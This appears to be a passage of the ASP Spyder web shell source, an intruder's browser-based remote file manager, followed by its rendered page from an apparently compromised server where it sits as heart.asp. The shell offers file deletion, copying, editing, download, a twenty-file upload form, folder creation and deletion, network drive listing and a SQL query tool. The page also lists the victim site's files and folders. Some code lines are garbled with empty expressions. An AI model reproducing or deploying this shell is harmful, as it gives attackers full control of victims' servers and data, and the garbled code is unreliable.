  708. response.write "<font face=arial size=-1 color=red>Missing, Insufficient data OR file is readonly...</font>"
  710. case else
  711. response.write "<font face=arial size=-1 color=red>" & err.description & "</font>"
  713. end select
  714. '---Report errors end
  715. %>
  716. <center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
  717. <font face=Courier>
  718. <table><tr><td>
  719. <form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" name="myform" >
  720. <Table bgcolor=#505050 ><tr><td bgcolor=#505050 >
  721. <font face=Arial size=-2 color=#ff8300 > PATH INFO : </font></td><td align=right ><font face=Arial size=-2 color=#ff8300 >Volume Label:</font> <%=drv.VolumeName%> </td></tr>
  722. <tr><td colspan=2 cellpadding=2 bgcolor=#303030 ><font face=Arial size=-1 color=gray>Virtual: http://<%=Request.ServerVariables("SERVER_NAME")%><%=Request.Servervariables("SCRIPT_NAME")%></Font><BR><font face=wingdings color=Gray >1</font><font face=Arial size=+1 > <%=showPath%></Font>
  723. <BR><input type=text width=40 size=60 name=txtpath value="<%=showPath%>" ><input type=submit name=cmd value=" View " >
  724. </td></tr></form></table>
  725. </td><td><center>
  726. <table bgcolor=#505050 cellpadding=4><tr><td bgcolor=black ><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?getDRVs=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>Retrieve Available Network Drives</a></td></tr>
  727. <tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>SQL Query Analyser</A></td></tr>
  728. <tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?logoff=@&...thankyou.for.using.ASpyder....~sir_shagalot!..[]"><font size=-2 face=arial>+++LOGOFF+++</A></td></tr></table>
  729. </td></tr></table>
  730. <p align=center ><Table width=75% bgcolor=#505050 cellpadding=4 ><tr><td>
  731. <form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" ><font face=arial size=-1 >Delete file from current directory:</font><BR>
  732. <select size=1 name=ToDelete >
  733. <option>------------------------------</option>"
  734. <%
  735. fi=0
  736. For each file in folder.Files
  737. Response.Write "<option>" & & "</option>"
  738. fi=fi+1
  739. next
  740. Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value=Delete ></form></td><td>"
  741. Response.Write "<form method=post name=frmCopyFile action=""" & Request.Servervariables("SCRIPT_NAME") & """ ><font face=arial size=-1 >Copy file too current directory:</font><br><select size=1 name=ToCopy >"
  742. Response.Write "<option>------------------------------</option>"
  743. For each file in fileCopy.Files
  744. Response.Write "<option>" & & "</option>"
  745. next
  746. Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value="" Copy "" ></form></td></tr></Table>"
  747. Response.Flush
  748. ' ---View Tree Begins Here
  749. Response.Write "<table Cellpading=2 width=75% bgcolor=#505050 ><tr><td valign=top width=50% bgcolor=#303030 >Folders:<BR><BR>"
  750. fo=0
  751. Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#c8c8c8><span style='cursor: hand;' OnClick=""getit('..')"">..</span></FONT><BR>"
  753. For each fold in folder.SubFolders '-->FOLDERz
  754. fo=fo+1
  755. Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick=""getit('" & & "')"">" & & "</span></FONT><BR>"
  756. Next
  757. %>
  758. <BR><center><form method=post action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
  759. <table bgcolor=#505050 cellspacing=4><tr><td>
  760. <font face=arial size=-1 title="Create and Delete folders by entering their names here manually.">Directory:</td></tr>
  761. <tr><td align=right ><input type=text size=20 name=DirName><BR>
  762. <input type=submit name=cmd value=Create><input type=submit name=cmd value=Delete><input type=hidden name=DirStuff value=@>
  763. </tr></td></table></form>
  764. <%
  765. Response.Write "<BR></td><td valign=top width=50% bgcolor=#303030 >Files:<BR><BR>"
  766. Response.Flush
  767. %>
  768. <form method=post name=frmCopySelected action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
  769. <%
  770. Response.write "<center><select name=Fname size=" & fi+3 & " style=""background-color: rgb(48,48,48); color: rgb(210,210,210)"">"
  771. For each file in folder.Files '-->FILEz
  772. Response.Write "<option value=""" & & """>&nbsp;&nbsp;" & & " -- [" & Int(file.size/1024)+1 & " kb]</option>"
  773. Next
  774. Response.write "</select>"
  775. Response.write "<br><input type=submit name=cmd value="" Copy ""><input type=submit name=cmd value=""Edit/Create""><input type=submit name=cmd value=Download>"
  776. %>
  777. </form>
  778. <%
  779. Response.Write "<BR></td></tr><tr><td align=center ><B>Listed: " & fo & "</b></td><td align=center ><b>Listed: " & fi & "</b></td></tr></table><BR>"
  780. ' ---View Tree Ends Here
  781. ' ---Upload Routine starts here
  782. %>
  783. <form method="post" ENCTYPE="multipart/form-data" action="<%=Request.Servervariables("SCRIPT_NAME")%>?upload=@&txtpath=<%=MyPath%>">
  784. <table bgcolor="#505050" cellpadding="8">
  785. <tr>
  786. <td bgcolor=#303030 valign="bottom"><font size=+1 face=wingdings color=Gray >2</font><font face="Arial" size=-2 color="#ff8300"> SELECT FILES TO UPLOAD:<br>
  787. <input TYPE="FILE" SIZE="53" NAME="FILE1"><BR>
  788. <input TYPE="FILE" SIZE="53" NAME="FILE2"><BR>
  789. <input TYPE="FILE" SIZE="53" NAME="FILE3"><BR>
  790. <input TYPE="FILE" SIZE="53" NAME="FILE4"><BR>
  791. <input TYPE="FILE" SIZE="53" NAME="FILE5"><BR>
  792. <input TYPE="FILE" SIZE="53" NAME="FILE6"><BR>
  793. <input TYPE="FILE" SIZE="53" NAME="FILE7"><BR>
  794. <input TYPE="FILE" SIZE="53" NAME="FILE8"><BR>
  795. <input TYPE="FILE" SIZE="53" NAME="FILE9"><BR>
  796. <input TYPE="FILE" SIZE="53" NAME="FILE10"><BR>
  797. <input TYPE="FILE" SIZE="53" NAME="FILE11"><BR>
  798. <input TYPE="FILE" SIZE="53" NAME="FILE12"><BR>
  799. <input TYPE="FILE" SIZE="53" NAME="FILE13"><BR>
  800. <input TYPE="FILE" SIZE="53" NAME="FILE14"><BR>
  801. <input TYPE="FILE" SIZE="53" NAME="FILE15"><BR>
  802. <input TYPE="FILE" SIZE="53" NAME="FILE16"><BR>
  803. <input TYPE="FILE" SIZE="53" NAME="FILE17"><BR>
  804. <input TYPE="FILE" SIZE="53" NAME="FILE18"><BR>
  805. <input TYPE="FILE" SIZE="53" NAME="FILE19"><BR>
  806. <input TYPE="FILE" SIZE="53" NAME="FILE20"><BR>
  808. &nbsp;&nbsp;<input TYPE="submit" VALUE="Upload !" name="Upload" TITLE="If you recieve an error while uploading, then most likely you do not have write access to disk !!">
  809. </font></td>
  810. </tr>
  811. </table>
  812. <BR>
  813. <table bgcolor="#505050" cellpadding="6">
  814. <tr>
  815. <td bgcolor="#000000" valign="bottom"><font face="Arial" size="-2" color=gray>NOTE FOR UPLOAD -
  819. </tr>
  820. </table>
  821. </form>
  822. <%
  823. ' ---Upload Routine stops here
  824. %>
  826. </font><HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=1 face=arial>[ System: <%=now%> ]</font></p><BR>
  827. </body></html>
  828. <html>
  829. <style>
  830. <!--
  831. A:link {font-style: text-decoration: none; color: #c8c8c8}
  832. A:visited {font-style: text-decoration: none; color: #777777}
  833. A:active {font-style: text-decoration: none; color: #ff8300}
  834. A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
  835. * {scrollbar-base-color:#777777;
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  837. scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
  838. input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
  839. //-->
  840. </style>
  842. <title>E:\</title>
  843. </head>
  844. <body bgcolor=black text=white topAprgin="0">
  845. <!-- Copyright Vela iNC. Apr2003 [] Coded by ~sir_shagalot -->
  847. <HEAD>
  848. <SCRIPT Language="VBScript">
  849. sub getit(thestuff)
  850. if right("E:\\",1) <> "\" Then
  851. document.myform.txtpath.value = "E:\\" & "\" & thestuff
  852. Else
  853. document.myform.txtpath.value = "E:\\" & thestuff
  854. End If
  855. document.myform.submit()
  856. End sub
  857. </SCRIPT>
  858. </HEAD>
  859. <font face=arial size=-1 color=red>Path not found...</font>
  860. <center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
  861. <font face=Courier>
  862. <table><tr><td>
  863. <form method="post" action="/heart.asp" name="myform" >
  864. <Table bgcolor=#505050 ><tr><td bgcolor=#505050 >
  865. <font face=Arial size=-2 color=#ff8300 > PATH INFO : </font></td><td align=right ><font face=Arial size=-2 color=#ff8300 >Volume Label:</font> New Volume </td></tr>
  866. <tr><td colspan=2 cellpadding=2 bgcolor=#303030 ><font face=Arial size=-1 color=gray>Virtual:</Font><BR><font face=wingdings color=Gray >1</font><font face=Arial size=+1 > E:\\</Font>
  867. <BR><input type=text width=40 size=60 name=txtpath value="E:\\" ><input type=submit name=cmd value=" View " >
  868. </td></tr></form></table>
  869. </td><td><center>
  870. <table bgcolor=#505050 cellpadding=4><tr><td bgcolor=black ><a href="/heart.asp?getDRVs=@&txtpath=E:\"><font size=-2 face=arial>Retrieve Available Network Drives</a></td></tr>
  871. <tr><td bgcolor=black align=right><A HREF="/heart.asp?qa=@&txtpath=E:\"><font size=-2 face=arial>SQL Query Analyser</A></td></tr>
  872. <tr><td bgcolor=black align=right><A HREF="/heart.asp?logoff=@&...thankyou.for.using.ASpyder....~sir_shagalot!..[]"><font size=-2 face=arial>+++LOGOFF+++</A></td></tr></table>
  873. </td></tr></table>
  874. <p align=center ><Table width=75% bgcolor=#505050 cellpadding=4 ><tr><td>
  875. <form method="post" action="/heart.asp" ><font face=arial size=-1 >Delete file from current directory:</font><BR>
  876. <select size=1 name=ToDelete >
  877. <option>------------------------------</option>"
  878. <option>abandon.asp</option><option>abandonview.asp</option><option>alldocView-9-08-04.asp</option><option>alldocView.asp</option><option>banner.asp</option><option>dark.asp</option><option>default.asp</option><option>favicon.ico</option><option>footer.asp</option><option>forgotpassword.asp</option><option>fr_folders.asp</option><option>global.asa</option><option>Global.asp</option><option>Government MIS.xdw</option><option>GovernmentMIS.xdw</option><option>GovMIS.xdw</option><option>heart.asp</option><option>images.html</option><option>includeforgotpassword.asp</option><option>index.html</option><option>isp.asp</option><option>killall.asp</option><option>logoncheck.asp</option><option>main-9-08-04.asp</option><option>main.asp</option><option>main0.asp</option><option>main1.asp</option><option>message.asp</option><option>npxdw.dll</option><option>PicList.asp</option><option>PopUpCalendar.asp</option><option>repository.asp</option><option>task.txt</option><option>TeamXCtrl.ocx</option><option>TEAMXLOGO.jpg</option><option>Thumbs.db</option><option>timeClock.asp</option><option>web.config</option></select><input type=hidden name=txtpath value="E:\"><input type=Submit name=cmd value=Delete ></form></td><td><form method=post name=frmCopyFile action="/heart.asp" ><font face=arial size=-1 >Copy file too current directory:</font><br><select size=1 name=ToCopy ><option>------------------------------</option></select><input type=hidden name=txtpath value="E:\"><input type=Submit name=cmd value=" Copy " ></form></td></tr></Table><table Cellpading=2 width=75% bgcolor=#505050 ><tr><td valign=top width=50% bgcolor=#303030 >Folders:<BR><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#c8c8c8><span style='cursor: hand;' OnClick="getit('..')">..</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('admin')">admin</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('aspnet_client')">aspnet_client</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('calendar')">calendar</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('clients')">clients</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('employees')">employees</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('Fonts')">Fonts</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('forum')">forum</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('generalnews')">generalnews</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('Help')">Help</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('images')">images</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('includes')">includes</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('messages')">messages</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('MyDBAdmin')">MyDBAdmin</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('news')">news</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('projects')">projects</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('reminder')">reminder</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('reports')">reports</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' 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OnClick="getit('upload')">upload</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('webadm')">webadm</span></FONT><BR>
  879. <BR><center><form method=post action="/heart.asp?txtpath=E:\">
  880. <table bgcolor=#505050 cellspacing=4><tr><td>
  881. <font face=arial size=-1 title="Create and Delete folders by entering their names here manually.">Directory:</td></tr>
  882. <tr><td align=right ><input type=text size=20 name=DirName><BR>
  883. <input type=submit name=cmd value=Create><input type=submit name=cmd value=Delete><input type=hidden name=DirStuff value=@>
  884. </tr></td></table></form>
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  887. <center><select name=Fname size=41 style="background-color: rgb(48,48,48); color: rgb(210,210,210)"><option value="abandon.asp">&nbsp;&nbsp;abandon.asp -- [1 kb]</option><option value="abandonview.asp">&nbsp;&nbsp;abandonview.asp -- [1 kb]</option><option value="alldocView-9-08-04.asp">&nbsp;&nbsp;alldocView-9-08-04.asp -- [28 kb]</option><option value="alldocView.asp">&nbsp;&nbsp;alldocView.asp -- [34 kb]</option><option value="banner.asp">&nbsp;&nbsp;banner.asp -- [1 kb]</option><option value="dark.asp">&nbsp;&nbsp;dark.asp -- [80 kb]</option><option value="default.asp">&nbsp;&nbsp;default.asp -- [5 kb]</option><option value="favicon.ico">&nbsp;&nbsp;favicon.ico -- [2 kb]</option><option value="footer.asp">&nbsp;&nbsp;footer.asp -- [2 kb]</option><option value="forgotpassword.asp">&nbsp;&nbsp;forgotpassword.asp -- [4 kb]</option><option value="fr_folders.asp">&nbsp;&nbsp;fr_folders.asp -- [3 kb]</option><option value="global.asa">&nbsp;&nbsp;global.asa -- [3 kb]</option><option value="Global.asp">&nbsp;&nbsp;Global.asp -- [1 kb]</option><option value="Government MIS.xdw">&nbsp;&nbsp;Government MIS.xdw -- [74 kb]</option><option value="GovernmentMIS.xdw">&nbsp;&nbsp;GovernmentMIS.xdw -- [74 kb]</option><option value="GovMIS.xdw">&nbsp;&nbsp;GovMIS.xdw -- [74 kb]</option><option value="heart.asp">&nbsp;&nbsp;heart.asp -- [35 kb]</option><option value="images.html">&nbsp;&nbsp;images.html -- [1 kb]</option><option value="includeforgotpassword.asp">&nbsp;&nbsp;includeforgotpassword.asp -- [3 kb]</option><option value="index.html">&nbsp;&nbsp;index.html -- [11 kb]</option><option value="isp.asp">&nbsp;&nbsp;isp.asp -- [1 kb]</option><option value="killall.asp">&nbsp;&nbsp;killall.asp -- [1 kb]</option><option value="logoncheck.asp">&nbsp;&nbsp;logoncheck.asp -- [10 kb]</option><option value="main-9-08-04.asp">&nbsp;&nbsp;main-9-08-04.asp -- [7 kb]</option><option value="main.asp">&nbsp;&nbsp;main.asp -- [8 kb]</option><option value="main0.asp">&nbsp;&nbsp;main0.asp -- [8 kb]</option><option value="main1.asp">&nbsp;&nbsp;main1.asp -- [7 kb]</option><option value="message.asp">&nbsp;&nbsp;message.asp -- [3 kb]</option><option value="npxdw.dll">&nbsp;&nbsp;npxdw.dll -- [1061 kb]</option><option value="PicList.asp">&nbsp;&nbsp;PicList.asp -- [1 kb]</option><option value="PopUpCalendar.asp">&nbsp;&nbsp;PopUpCalendar.asp -- [7 kb]</option><option value="repository.asp">&nbsp;&nbsp;repository.asp -- [25 kb]</option><option value="task.txt">&nbsp;&nbsp;task.txt -- [2 kb]</option><option value="TeamXCtrl.ocx">&nbsp;&nbsp;TeamXCtrl.ocx -- [1549 kb]</option><option value="TEAMXLOGO.jpg">&nbsp;&nbsp;TEAMXLOGO.jpg -- [12 kb]</option><option value="Thumbs.db">&nbsp;&nbsp;Thumbs.db -- [7 kb]</option><option value="timeClock.asp">&nbsp;&nbsp;timeClock.asp -- [2 kb]</option><option value="web.config">&nbsp;&nbsp;web.config -- [1 kb]</option></select><br><input type=submit name=cmd value=" Copy "><input type=submit name=cmd value="Edit/Create"><input type=submit name=cmd value=Download>
  888. </form>
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  894. <input TYPE="FILE" SIZE="53" NAME="FILE1"><BR>
  895. <input TYPE="FILE" SIZE="53" NAME="FILE2"><BR>
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